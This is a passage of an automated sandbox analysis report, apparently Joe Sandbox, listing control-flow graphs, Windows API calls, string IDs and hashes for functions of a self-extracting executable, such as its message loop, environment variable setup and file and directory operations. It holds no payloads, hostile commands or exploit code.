                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1999340476-0
                                                                                                                                    • Opcode ID: 116af476fbd6ca01f4b4c243ae4706c7c92dc991c2aa939ee4670df612c3f74b
                                                                                                                                    • Instruction ID: 73e231b0c3446b0a6055954c9f7d091fe51d259c73c9923745a36b87ac5a5ced
                                                                                                                                    • Opcode Fuzzy Hash: 116af476fbd6ca01f4b4c243ae4706c7c92dc991c2aa939ee4670df612c3f74b
                                                                                                                                    • Instruction Fuzzy Hash: BC315730544745AFE7329F20CC46BEABBDCBB05320F214B1EF9A1962C4D3B5A954CB90

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1059 37b568-37b581 PeekMessageW 1060 37b583-37b597 GetMessageW 1059->1060 1061 37b5bc-37b5be 1059->1061 1062 37b599-37b5a6 IsDialogMessageW 1060->1062 1063 37b5a8-37b5b6 TranslateMessage DispatchMessageW 1060->1063 1062->1061 1062->1063 1063->1061
                                                                                                                                    APIs
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                                                                    • IsDialogMessageW.USER32(00010474,?), ref: 0037B59E
                                                                                                                                    • TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1266772231-0
                                                                                                                                    • Opcode ID: 5b250027098fdd805917fa6484cd89a6ce52c8267cd3e281c05b3407d4fb288e
                                                                                                                                    • Instruction ID: 90fc68871fbf0b2a5b372c8a7bdc0d7b76696edab0c721987caa6ce8f69f7140
                                                                                                                                    • Opcode Fuzzy Hash: 5b250027098fdd805917fa6484cd89a6ce52c8267cd3e281c05b3407d4fb288e
                                                                                                                                    • Instruction Fuzzy Hash: 0EF09B72E01129BBCB21ABE6DC4CDEBBFBCEE05755B408415B51AD2050EB78E605CBB0

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1064 37abab-37abca GetClassNameW 1065 37abf2-37abf4 1064->1065 1066 37abcc-37abe1 call 371fbb 1064->1066 1067 37abf6-37abf9 SHAutoComplete 1065->1067 1068 37abff-37ac01 1065->1068 1071 37abe3-37abef FindWindowExW 1066->1071 1072 37abf1 1066->1072 1067->1068 1071->1072 1072->1065
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0037ABC2
                                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0037ABF9
                                                                                                                                      • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0037ABE9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                    • String ID: EDIT
                                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                                    • Opcode ID: f43f750cca0b0e55427dd0cbc9ea93283e7354014f95c02292c07e5190f386ae
                                                                                                                                    • Instruction ID: 32735b16bdbb3ae793bb6a85f9ac98d3705dbb24da5ef0637dcb757d9570b23f
                                                                                                                                    • Opcode Fuzzy Hash: f43f750cca0b0e55427dd0cbc9ea93283e7354014f95c02292c07e5190f386ae
                                                                                                                                    • Instruction Fuzzy Hash: A1F08233601628B6DB3257649C09F9F766C9B86B40F498011BA49E6180D764EA4186B6

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1073 37dbde-37dc09 call 37ec50 SetEnvironmentVariableW call 370371 1077 37dc0e-37dc12 1073->1077 1078 37dc36-37dc38 1077->1078 1079 37dc14-37dc18 1077->1079 1080 37dc21-37dc28 call 37048d 1079->1080 1083 37dc1a-37dc20 1080->1083 1084 37dc2a-37dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                                                                    APIs
                                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037DBF4
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0037DC30
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                                    • Opcode ID: f5fefc7dd55c0db0b1388f66141e8b82162b7eb66053886d08e84e68d795f2e1
                                                                                                                                    • Instruction ID: 29e16d11330bc9cb8d5e60565f51ee244c81ab2deff4864637d489bfb4a61f46
                                                                                                                                    • Opcode Fuzzy Hash: f5fefc7dd55c0db0b1388f66141e8b82162b7eb66053886d08e84e68d795f2e1
                                                                                                                                    • Instruction Fuzzy Hash: 49F0ECB2404225A7DF333F958C46BFA376CAF04785B044455FD8D99161E6B98980D7B0

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1085 369785-369791 1086 369793-36979b GetStdHandle 1085->1086 1087 36979e-3697b5 ReadFile 1085->1087 1086->1087 1088 3697b7-3697c0 call 3698bc 1087->1088 1089 369811 1087->1089 1093 3697c2-3697ca 1088->1093 1094 3697d9-3697dd 1088->1094 1091 369814-369817 1089->1091 1093->1094 1097 3697cc 1093->1097 1095 3697ee-3697f2 1094->1095 1096 3697df-3697e8 GetLastError 1094->1096 1100 3697f4-3697fc 1095->1100 1101 36980c-36980f 1095->1101 1096->1095 1099 3697ea-3697ec 1096->1099 1098 3697cd-3697d7 call 369785 1097->1098 1098->1091 1099->1091 1100->1101 1103 3697fe-369807 GetLastError 1100->1103 1101->1091 1103->1101 1105 369809-36980a 1103->1105 1105->1098
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00369795
                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 003697AD
                                                                                                                                    • GetLastError.KERNEL32 ref: 003697DF
                                                                                                                                    • GetLastError.KERNEL32 ref: 003697FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2244327787-0
                                                                                                                                    • Opcode ID: 8865c3d6bc2f707be0b3d623be98b70364e6eb0f97b9e0ecdf71d3d0d0701806
                                                                                                                                    • Instruction ID: 967dc699e623174b825fd429787f518f1266d0e1be50430a78f28f718e414137
                                                                                                                                    • Opcode Fuzzy Hash: 8865c3d6bc2f707be0b3d623be98b70364e6eb0f97b9e0ecdf71d3d0d0701806
                                                                                                                                    • Instruction Fuzzy Hash: 74117C30910204EBDF225F64C804B693BADBB52364F11C92BE42786698D7759E44DB61
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00383F73,00000000,00000000,?,0038ACDB,00383F73,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue), ref: 0038AD66
                                                                                                                                    • GetLastError.KERNEL32(?,0038ACDB,00383F73,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue,00397970,FlsSetValue,00000000,00000364,?,003898B7), ref: 0038AD72
                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0038ACDB,00383F73,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue,00397970,FlsSetValue,00000000), ref: 0038AD80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                    • Opcode ID: 69f37045b6a9aae892b1241cf1ccf9cb4d5dc9edb00c3f0b77d7b48a5fbe640a
                                                                                                                                    • Instruction ID: 65505b8a6308959c17af99b6e6f987517b94ab0bba0fbef81e1efc3fda9e50e0
                                                                                                                                    • Opcode Fuzzy Hash: 69f37045b6a9aae892b1241cf1ccf9cb4d5dc9edb00c3f0b77d7b48a5fbe640a
                                                                                                                                    • Instruction Fuzzy Hash: 49014736201B22ABD7235B68DC54A977B9CEF017A2B220662F906D3660C722DC09C7E1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 003897E5: GetLastError.KERNEL32(?,003A1030,00384674,003A1030,?,?,00383F73,00000050,?,003A1030,00000200), ref: 003897E9
                                                                                                                                      • Part of subcall function 003897E5: _free.LIBCMT ref: 0038981C
                                                                                                                                      • Part of subcall function 003897E5: SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 0038985D
                                                                                                                                      • Part of subcall function 003897E5: _abort.LIBCMT ref: 00389863
                                                                                                                                      • Part of subcall function 0038BB4E: _abort.LIBCMT ref: 0038BB80
                                                                                                                                      • Part of subcall function 0038BB4E: _free.LIBCMT ref: 0038BBB4
                                                                                                                                      • Part of subcall function 0038B7BB: GetOEMCP.KERNEL32(00000000,?,?,0038BA44,?), ref: 0038B7E6
                                                                                                                                    • _free.LIBCMT ref: 0038BA9F
                                                                                                                                    • _free.LIBCMT ref: 0038BAD5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                    • String ID: p9
                                                                                                                                    • API String ID: 2991157371-1904256876
                                                                                                                                    • Opcode ID: d5b9743be0a647d531717e361829722d61082cca857472ec6b5a934df3aa554f
                                                                                                                                    • Instruction ID: 62eea3126074b3945908e62a9fa0cd2e2dcd882ad07054224f9047ec0b8eaaa7
                                                                                                                                    • Opcode Fuzzy Hash: d5b9743be0a647d531717e361829722d61082cca857472ec6b5a934df3aa554f
                                                                                                                                    • Instruction Fuzzy Hash: A531813190434AAFDB16FFA8D441BADB7E5EF40320F2540DAE5149B2A2EB369D41DB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0038BF30: GetEnvironmentStringsW.KERNEL32 ref: 0038BF39
                                                                                                                                      • Part of subcall function 0038BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038BF5C
                                                                                                                                      • Part of subcall function 0038BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038BF82
                                                                                                                                      • Part of subcall function 0038BF30: _free.LIBCMT ref: 0038BF95
                                                                                                                                      • Part of subcall function 0038BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038BFA4
                                                                                                                                    • _free.LIBCMT ref: 003882AE
                                                                                                                                    • _free.LIBCMT ref: 003882B5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                    • String ID: 0"<
                                                                                                                                    • API String ID: 400815659-1408697893
                                                                                                                                    • Opcode ID: 42dfa383a465bdd28affc9e84fab505774441cb54ce13ecad444b25ddfb2999c
                                                                                                                                    • Instruction ID: d43d7998bbae99f109b1947f12511610b6e2628786b1e6c23e773b13fbc0dd71
                                                                                                                                    • Opcode Fuzzy Hash: 42dfa383a465bdd28affc9e84fab505774441cb54ce13ecad444b25ddfb2999c
                                                                                                                                    • Instruction Fuzzy Hash: 3FE0E523605F4245D2A333792C02F6B06094FC1338BA50EDAF910DE1D3CE50880307A2
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 27$PDu<7
                                                                                                                                    • API String ID: 1269201914-895419741
                                                                                                                                    • Opcode ID: b13ffe9f40dfeb83c164d61366327faa248e8ccd9a00855aac5648b0c8c7161d
                                                                                                                                    • Instruction ID: e754d97d50ddcf497246f5aecd55ba9d29706f674bd3a98891bee039a0d429ff
                                                                                                                                    • Opcode Fuzzy Hash: b13ffe9f40dfeb83c164d61366327faa248e8ccd9a00855aac5648b0c8c7161d
                                                                                                                                    • Instruction Fuzzy Hash: 0FB012CB2680007D321761081D02F7B021CC0CAF20330D06EF42DC4480E8444C000533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: (7$PDu<7
                                                                                                                                    • API String ID: 1269201914-270680953
                                                                                                                                    • Opcode ID: 0a1e46f7b389dfcf375f5eeb5fa34b4499e1e6c737d2e5ee11e401bde62508ca
                                                                                                                                    • Instruction ID: e6849191d093bfce8e9202c78f756fff82d87949da97d0c262123808e55bb0cc
                                                                                                                                    • Opcode Fuzzy Hash: 0a1e46f7b389dfcf375f5eeb5fa34b4499e1e6c737d2e5ee11e401bde62508ca
                                                                                                                                    • Instruction Fuzzy Hash: 35B012CB2680407C321761081E02E3B071CC0CAF20330D06EF42DC4480E8454C010533
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0036D343,00000001,?,?,?,00000000,0037551D,?,?,?), ref: 00369F9E
                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0037551D,?,?,?,?,?,00374FC7,?), ref: 00369FE5
                                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0036D343,00000001,?,?), ref: 0036A011
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4209713984-0
                                                                                                                                    • Opcode ID: 0e737175e314012d2191ac1bd07a11bd0580d964738aafa825d78cf2a46fc9d9
                                                                                                                                    • Instruction ID: bcf7c35072c9266449ec111191044a727ac44cc01387955a23b15728a04c3607
                                                                                                                                    • Opcode Fuzzy Hash: 0e737175e314012d2191ac1bd07a11bd0580d964738aafa825d78cf2a46fc9d9
                                                                                                                                    • Instruction Fuzzy Hash: C131B171208305AFDB16CF24D818B6E77A9FF84711F05891EF981AB294C775AD48CBA2
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0036C27E: _wcslen.LIBCMT ref: 0036C284
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A2D9
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A30C
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A329
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2260680371-0
                                                                                                                                    • Opcode ID: 86c07ad34b9c786b3b5b2dbaa7ab2922ec5dcdcd5309fef30e1c5a8dc1fe1954
                                                                                                                                    • Instruction ID: d731d80e32b3320f0d976751a130050523f4ec11e1158e4e8c95aac4a53b72d3
